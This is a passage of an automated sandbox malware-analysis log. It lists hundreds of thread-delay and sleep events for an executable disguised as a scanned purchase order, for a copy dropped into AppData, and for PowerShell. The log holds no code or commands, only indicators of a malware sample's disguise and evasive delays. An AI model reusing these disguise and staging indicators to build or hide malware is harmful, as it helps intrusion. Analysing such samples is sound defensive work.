                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597312
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597203
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597093
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596984
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596656
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596325
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595999
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595889
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595561
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595452
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595343
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595234
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595124
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595015
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594906
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594796
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594687
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594468
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5931Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3872Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeWindow / User API: threadDelayed 5928Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeWindow / User API: threadDelayed 3902Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeWindow / User API: threadDelayed 1879
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeWindow / User API: threadDelayed 7978
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 1900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599883s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7344Thread sleep count: 5928 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7344Thread sleep count: 3902 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599213s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598999s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598889s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598170s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597136s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597030s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596878s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596753s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596345s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595796s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595249s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594921s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594481s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594155s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep count: 35 > 30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -32281802128991695s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7552Thread sleep count: 1879 > 30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7552Thread sleep count: 7978 > 30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599327s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598671s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598265s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598155s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597858s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597749s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597421s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597312s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597093s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596325s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595999s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595889s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595671s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595561s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595452s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595124s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594796s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594468s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599883Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599213Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598889Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598765Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598422Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598170Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597609Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597136Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597030Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596878Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596753Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596345Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595687Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595578Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594921Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594481Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594374Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594155Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599327
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598375
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598265
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598155
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597984
